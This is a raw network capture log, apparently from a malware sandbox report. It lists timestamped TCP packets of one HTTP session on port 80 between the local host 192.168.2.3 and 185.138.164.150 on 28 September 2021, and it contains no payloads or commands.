Sep 28, 2021 08:53:37.966710091 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.966734886 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.997638941 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997695923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997735977 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997775078 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997811079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997848988 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997885942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997935057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.997963905 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.997977972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.998016119 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.998018026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.998058081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.998096943 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.998111963 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.998166084 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:37.998389006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:37.998496056 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.000722885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.000799894 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.000837088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.000871897 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.000983000 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.000988960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001049995 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001059055 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001142025 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001142979 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001211882 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001279116 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001310110 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001333952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001406908 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001418114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001455069 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001488924 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001523972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001524925 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001558065 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001616955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001657009 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001693010 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001722097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001749039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001794100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001832962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001857042 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001866102 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001871109 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001907110 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.001908064 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001944065 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.001987934 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002010107 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002038956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002064943 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002074957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002110004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002152920 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002187014 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002188921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002227068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002273083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002285957 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002309084 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002353907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002370119 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002393961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002418995 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002429008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002465010 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002479076 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002501011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002535105 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002564907 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.002569914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.002654076 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.003654003 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.003752947 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033139944 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033220053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033251047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033281088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033328056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033359051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033401012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033437967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033477068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033515930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033546925 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033564091 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033582926 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033588886 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033607006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033608913 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033644915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033684015 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.033684969 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.033751965 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.034248114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037708044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037745953 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037794113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037813902 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.037837982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037869930 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.037874937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037913084 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037935972 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.037950039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.037988901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038014889 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038027048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038064003 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038089991 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038110971 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038153887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038171053 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038191080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038228989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038247108 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038268089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038304090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038322926 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038341999 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038379908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038395882 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038428068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038470984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038494110 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038546085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038598061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038624048 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038635015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038671970 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038701057 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038710117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038757086 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038765907 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038800001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038836956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038853884 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038875103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038913965 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038939953 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.038949013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.038995981 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039012909 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.039041996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039088964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039098978 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.039288044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039331913 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039367914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039371967 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.039414883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039429903 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.039457083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039494991 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.039521933 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.040849924 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.040894032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.040951014 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.068773985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.068834066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.068865061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.068893909 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.068933964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.068965912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069015980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069055080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069092989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069132090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069135904 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.069169998 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069180012 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.069185972 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.069190979 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.069221020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069266081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069267035 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.069303989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.069334030 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.071434021 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.071945906 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.073930025 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.073995113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.074151993 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.074686050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.074727058 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.074837923 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.075017929 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075062037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075145960 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.075443983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075485945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075570107 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.075797081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075846910 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.075931072 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.076179028 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076250076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076328993 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.076653957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076703072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076746941 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076785088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.076842070 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.076875925 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.077356100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.077802896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.077841043 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.077905893 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.077953100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078002930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078042030 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078080893 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078085899 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078119993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078156948 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078156948 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078193903 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078196049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078234911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078274012 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078283072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078325987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078360081 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078361988 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078402042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078440905 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078474045 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078475952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078516006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078519106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078555107 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078596115 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078603983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078645945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078684092 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078685999 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.078722954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.078799963 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.080580950 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.080621958 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.080662966 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.080780983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.080878019 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.105659008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105722904 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105761051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105798960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105834961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105882883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105935097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.105973005 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106020927 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106062889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106110096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106110096 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.106131077 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.106133938 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.106148958 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106188059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106216908 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.106223106 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.106278896 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.106878042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.107425928 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.107466936 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.108172894 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.109515905 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109559059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109595060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109632969 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109636068 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.109711885 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.109891891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109935045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.109963894 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.110219955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.110258102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.110307932 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.110954046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.111000061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.111036062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.111100912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.111200094 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.112433910 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.112483978 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.112523079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.112560034 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.112605095 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.112646103 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113396883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113436937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113486052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113517046 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113528013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113562107 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113567114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113607883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113642931 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113646984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113686085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113715887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113725901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113765001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113801003 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113812923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113857031 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113881111 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113894939 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113934994 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.113955975 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.113995075 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114033937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114068031 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.114073038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114111900 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114140034 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.114149094 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114187956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114221096 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.114226103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114274979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.114293098 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.116338968 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.116381884 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.116417885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.116430998 CEST	49744	80	192.168.2.3	185.138.164.150
